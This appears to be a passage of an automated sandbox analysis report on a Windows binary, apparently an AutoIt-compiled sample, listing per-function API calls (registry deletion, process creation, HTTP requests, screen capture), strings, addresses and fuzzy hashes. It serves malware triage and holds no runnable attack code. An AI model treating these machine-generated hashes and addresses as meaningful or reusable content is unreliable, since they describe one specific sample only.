                • Opcode Fuzzy Hash: 999ccb1e1a3cb1e36b882da5eb6abf0c1a21fcc0d83b600789d262d0017aa76d
                • Instruction Fuzzy Hash: 3E4151B0D443196ADB109FBA8C8985EBFE8FF04354B50452AF11DE7281DB78A9418F91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001300C6
                  • Part of subcall function 001300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(001E070C,00000FA0,9F0A8506,?,?,?,?,001523B3,000000FF), ref: 0013011C
                  • Part of subcall function 001300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001523B3,000000FF), ref: 00130127
                  • Part of subcall function 001300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001523B3,000000FF), ref: 00130138
                  • Part of subcall function 001300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0013014E
                  • Part of subcall function 001300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0013015C
                  • Part of subcall function 001300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0013016A
                  • Part of subcall function 001300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00130195
                  • Part of subcall function 001300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001301A0
                • ___scrt_fastfail.LIBCMT ref: 001300E7
                  • Part of subcall function 001300A3: __onexit.LIBCMT ref: 001300A9
                Strings
                • InitializeConditionVariable, xrefs: 00130148
                • SleepConditionVariableCS, xrefs: 00130154
                • kernel32.dll, xrefs: 00130133
                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00130122
                • WakeAllConditionVariable, xrefs: 00130162
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                • API String ID: 66158676-1714406822
                • Opcode ID: 914054f235a9031b54ab4527f390e5a4f8d2c8e37253b869ae9afbe3390f9390
                • Instruction ID: c32616d2667cc49ad41dad42185a65ecdd71e750cd4be0a7ad4e34dd190a1bc9
                • Opcode Fuzzy Hash: 914054f235a9031b54ab4527f390e5a4f8d2c8e37253b869ae9afbe3390f9390
                • Instruction Fuzzy Hash: C921F936A44710ABE7236BE4AC55B6E73E4EB0EF51F010139F801E6A91DBB49C808AD0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                • API String ID: 176396367-1603158881
                • Opcode ID: 40be71fddd1bf7fa556bed8aa82335a7c65f56569f77f2aa89f4d040acd00102
                • Instruction ID: 2bcb49648df843f38da2c06b6fdab0e826e43f52d61d6c7ca5e6a188e6a7f67e
                • Opcode Fuzzy Hash: 40be71fddd1bf7fa556bed8aa82335a7c65f56569f77f2aa89f4d040acd00102
                • Instruction Fuzzy Hash: 83E1B532A00516ABCB289F78C4517EEFBB5BF54710F55C12AE46AB7240DB30AE85E790
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharLowerBuffW.USER32(00000000,00000000,001ACC08), ref: 00184527
                • _wcslen.LIBCMT ref: 0018453B
                • _wcslen.LIBCMT ref: 00184599
                • _wcslen.LIBCMT ref: 001845F4
                • _wcslen.LIBCMT ref: 0018463F
                • _wcslen.LIBCMT ref: 001846A7
                  • Part of subcall function 0012F9F2: _wcslen.LIBCMT ref: 0012F9FD
                • GetDriveTypeW.KERNEL32(?,001D6BF0,00000061), ref: 00184743
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharDriveLowerType
                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                • API String ID: 2055661098-1000479233
                • Opcode ID: 0d94e4816fddd0d8adc61276100aaca6e206f7bc3a82cf8181dce43e88f287ab
                • Instruction ID: 94e39266ce0829dc4728b2dc5cade7106749dea74d1112e8159e81792672f31c
                • Opcode Fuzzy Hash: 0d94e4816fddd0d8adc61276100aaca6e206f7bc3a82cf8181dce43e88f287ab
                • Instruction Fuzzy Hash: 35B1C3316083039FC714EF28C890A6EB7E5AFA5764F50492DF496C7291EB30DA85CF92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _wcslen.LIBCMT ref: 0019B198
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0019B1B0
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0019B1D4
                • _wcslen.LIBCMT ref: 0019B200
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0019B214
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0019B236
                • _wcslen.LIBCMT ref: 0019B332
                  • Part of subcall function 001805A7: GetStdHandle.KERNEL32(000000F6), ref: 001805C6
                • _wcslen.LIBCMT ref: 0019B34B
                • _wcslen.LIBCMT ref: 0019B366
                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0019B3B6
                • GetLastError.KERNEL32(00000000), ref: 0019B407
                • CloseHandle.KERNEL32(?), ref: 0019B439
                • CloseHandle.KERNEL32(00000000), ref: 0019B44A
                • CloseHandle.KERNEL32(00000000), ref: 0019B45C
                • CloseHandle.KERNEL32(00000000), ref: 0019B46E
                • CloseHandle.KERNEL32(?), ref: 0019B4E3
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                • String ID:
                • API String ID: 2178637699-0
                • Opcode ID: 1d6522aa19e680814fd515f9c912e76e731025706fcdaa8233966f64719e053e
                • Instruction ID: 597040f6538708517384a0aea7a909e7461ad2e547b9c10ebbbd04e0eb141346
                • Opcode Fuzzy Hash: 1d6522aa19e680814fd515f9c912e76e731025706fcdaa8233966f64719e053e
                • Instruction Fuzzy Hash: 8EF1A0316083009FCB15EF24D991B6EBBE1BF85714F14856DF8999B2A2DB31EC44CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetMenuItemCount.USER32(001E1990), ref: 00152F8D
                • GetMenuItemCount.USER32(001E1990), ref: 0015303D
                • GetCursorPos.USER32(?), ref: 00153081
                • SetForegroundWindow.USER32(00000000), ref: 0015308A
                • TrackPopupMenuEx.USER32(001E1990,00000000,?,00000000,00000000,00000000), ref: 0015309D
                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001530A9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                • String ID: 0
                • API String ID: 36266755-4108050209
                • Opcode ID: add2b9108dd5e66f0efdefda76245d9e64f8d1496c1ad910509621727beabeec
                • Instruction ID: a5f395f1801c2d6359be300893b21e5014ffe04c875c02c8ea14a4de4be8df73
                • Opcode Fuzzy Hash: add2b9108dd5e66f0efdefda76245d9e64f8d1496c1ad910509621727beabeec
                • Instruction Fuzzy Hash: 93713771644205FEEB299F64DC89FAABF64FF02364F204216F9346A1E0C7B1A954CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DestroyWindow.USER32(?,?), ref: 001A6DEB
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001A6E5F
                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001A6E81
                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A6E94
                • DestroyWindow.USER32(?), ref: 001A6EB5
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00110000,00000000), ref: 001A6EE4
                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A6EFD
                • GetDesktopWindow.USER32 ref: 001A6F16
                • GetWindowRect.USER32(00000000), ref: 001A6F1D
                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001A6F35
                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001A6F4D
                  • Part of subcall function 00129944: GetWindowLongW.USER32(?,000000EB), ref: 00129952
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                • String ID: 0$tooltips_class32
                • API String ID: 2429346358-3619404913
                • Opcode ID: 2c2f9958f86914f56a545eaaf2987b559a14a7dc1b4b5bb9c477fceffb5a2cb7
                • Instruction ID: 0a2dae6a8673a6342ad05d83c464f7a9ffe101086f62a0a8be6b116ecfef2c33
                • Opcode Fuzzy Hash: 2c2f9958f86914f56a545eaaf2987b559a14a7dc1b4b5bb9c477fceffb5a2cb7
                • Instruction Fuzzy Hash: 84716778144244AFDB21CF28DC94FBABBE9FB8A304F08041EF999872A1C770A945CB51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00129BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00129BB2
                • DragQueryPoint.SHELL32(?,?), ref: 001A9147
                  • Part of subcall function 001A7674: ClientToScreen.USER32(?,?), ref: 001A769A
                  • Part of subcall function 001A7674: GetWindowRect.USER32(?,?), ref: 001A7710
                  • Part of subcall function 001A7674: PtInRect.USER32(?,?,001A8B89), ref: 001A7720
                • SendMessageW.USER32(?,000000B0,?,?), ref: 001A91B0
                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001A91BB
                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001A91DE
                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001A9225
                • SendMessageW.USER32(?,000000B0,?,?), ref: 001A923E
                • SendMessageW.USER32(?,000000B1,?,?), ref: 001A9255
                • SendMessageW.USER32(?,000000B1,?,?), ref: 001A9277
                • DragFinish.SHELL32(?), ref: 001A927E
                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001A9371
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                • API String ID: 221274066-3440237614
                • Opcode ID: 2af42d13a9c312964b08f4d873f9f9a7ea4e6994561293056f1c3cf661d43e77
                • Instruction ID: 58911a160798fae4085e71cfa98c49424545c1aacbf3403c8d09ff4042b0c67b
                • Opcode Fuzzy Hash: 2af42d13a9c312964b08f4d873f9f9a7ea4e6994561293056f1c3cf661d43e77
                • Instruction Fuzzy Hash: E7617C71108301AFC705DF64DC85DAFBBE8FF99750F00092EF596962A1DB309A89CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0018C4B0
                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0018C4C3
                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0018C4D7
                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0018C4F0
                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0018C533
                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0018C549
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018C554
                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0018C584
                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0018C5DC
                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0018C5F0
                • InternetCloseHandle.WININET(00000000), ref: 0018C5FB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                • String ID:
                • API String ID: 3800310941-3916222277
                • Opcode ID: 7fd70569f4d46b4f879f0cf638ed6b74eded294918ad87b1c790f85b3fc79c1a
                • Instruction ID: 382ae1742bfbc42151d3689ea5ca046381a863de77e7b147aae53a25e061e7f3
                • Opcode Fuzzy Hash: 7fd70569f4d46b4f879f0cf638ed6b74eded294918ad87b1c790f85b3fc79c1a
                • Instruction Fuzzy Hash: D0513DB1600605BFDB21AFA4C988AAB7BFCFF09754F10441AF94596650DB34EA449FB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 001A8592
                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85A2
                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85AD
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85BA
                • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85C8
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85D7
                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85E0
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85E7
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001A85F8
                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,001AFC38,?), ref: 001A8611
                • GlobalFree.KERNEL32(00000000), ref: 001A8621
                • GetObjectW.GDI32(?,00000018,?), ref: 001A8641
                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001A8671
                • DeleteObject.GDI32(?), ref: 001A8699
                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001A86AF
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                • String ID:
                • API String ID: 3840717409-0
                • Opcode ID: ad43a7b62b4c47ec34e37c64d49cbce1d4eb7ba0e9b4e5ed11382eba0ee93461
                • Instruction ID: 24823edc82813c35e7ec4870b5c1a2a49c44a17b736b34c26d695f033ce8b345
                • Opcode Fuzzy Hash: ad43a7b62b4c47ec34e37c64d49cbce1d4eb7ba0e9b4e5ed11382eba0ee93461
                • Instruction Fuzzy Hash: E741F875600208AFDB11DFA5DC48EABBBB8FF8AB15F144159F909E7260DB309D41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(00000000), ref: 00181502
                • VariantCopy.OLEAUT32(?,?), ref: 0018150B
                • VariantClear.OLEAUT32(?), ref: 00181517
                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001815FB
                • VarR8FromDec.OLEAUT32(?,?), ref: 00181657
                • VariantInit.OLEAUT32(?), ref: 00181708
                • SysFreeString.OLEAUT32(?), ref: 0018178C
                • VariantClear.OLEAUT32(?), ref: 001817D8
                • VariantClear.OLEAUT32(?), ref: 001817E7
                • VariantInit.OLEAUT32(00000000), ref: 00181823
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                • String ID: %4d%02d%02d%02d%02d%02d$Default
                • API String ID: 1234038744-3931177956
                • Opcode ID: d3dc412e342ef84ec995b0dfc585a07677afea9a55aa585523b6362ded62451c
                • Instruction ID: fe0961081f1d6185c0e46b8e779762c1d9e210058a1b8429085ecf41c85b528e
                • Opcode Fuzzy Hash: d3dc412e342ef84ec995b0dfc585a07677afea9a55aa585523b6362ded62451c
                • Instruction Fuzzy Hash: 87D1F433A00115EBDB18AF65E885B7DB7B9BF46700F11806AF446AB580DB30DE92DF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 0019C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0019B6AE,?,?), ref: 0019C9B5
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019C9F1
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA68
                  • Part of subcall function 0019C998: _wcslen.LIBCMT ref: 0019CA9E
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019B6F4
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0019B772
                • RegDeleteValueW.ADVAPI32(?,?), ref: 0019B80A
                • RegCloseKey.ADVAPI32(?), ref: 0019B87E
                • RegCloseKey.ADVAPI32(?), ref: 0019B89C
                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0019B8F2
                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0019B904
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0019B922
                • FreeLibrary.KERNEL32(00000000), ref: 0019B983
                • RegCloseKey.ADVAPI32(00000000), ref: 0019B994
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 146587525-4033151799
                • Opcode ID: b83b99dcf0d014b4a5ebf47625d7007707b20b648de69c59e56133590136916d
                • Instruction ID: 683c81f9a221a71863496086a45047bc102771d544fe36b68d3626e96dc034bd
                • Opcode Fuzzy Hash: b83b99dcf0d014b4a5ebf47625d7007707b20b648de69c59e56133590136916d
                • Instruction Fuzzy Hash: C5C18C74208201AFDB14DF14D5D4F6ABBE5BF84308F14855CF5AA8B2A2CB71EC85CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetDC.USER32(00000000), ref: 001925D8
                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001925E8
                • CreateCompatibleDC.GDI32(?), ref: 001925F4
                • SelectObject.GDI32(00000000,?), ref: 00192601
                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0019266D
                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001926AC
                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001926D0
                • SelectObject.GDI32(?,?), ref: 001926D8
                • DeleteObject.GDI32(?), ref: 001926E1
                • DeleteDC.GDI32(?), ref: 001926E8
                • ReleaseDC.USER32(00000000,?), ref: 001926F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                • String ID: (
                • API String ID: 2598888154-3887548279
                • Opcode ID: fafcf9b9f2eeb924132b80984d5fd132924aeb848e95fe4f04b9ad9dd72ad5ac
                • Instruction ID: 160319584b397a64a76be7b62c9ef1fc5184308339de7c153373d0b3b8de8abc
                • Opcode Fuzzy Hash: fafcf9b9f2eeb924132b80984d5fd132924aeb848e95fe4f04b9ad9dd72ad5ac
                • Instruction Fuzzy Hash: 4061F3B5E00219EFCF04CFA4D984AAEBBF6FF58310F208529E955A7650E770A951CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ___free_lconv_mon.LIBCMT ref: 0014DAA1
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D659
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D66B
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D67D
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D68F
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6A1
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6B3
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6C5
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6D7
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6E9
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D6FB
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D70D
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D71F
                  • Part of subcall function 0014D63C: _free.LIBCMT ref: 0014D731
                • _free.LIBCMT ref: 0014DA96
                  • Part of subcall function 001429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000), ref: 001429DE
                  • Part of subcall function 001429C8: GetLastError.KERNEL32(00000000,?,0014D7D1,00000000,00000000,00000000,00000000,?,0014D7F8,00000000,00000007,00000000,?,0014DBF5,00000000,00000000), ref: 001429F0
                • _free.LIBCMT ref: 0014DAB8
                • _free.LIBCMT ref: 0014DACD
                • _free.LIBCMT ref: 0014DAD8
                • _free.LIBCMT ref: 0014DAFA
                • _free.LIBCMT ref: 0014DB0D
                • _free.LIBCMT ref: 0014DB1B
                • _free.LIBCMT ref: 0014DB26
                • _free.LIBCMT ref: 0014DB5E
                • _free.LIBCMT ref: 0014DB65
                • _free.LIBCMT ref: 0014DB82
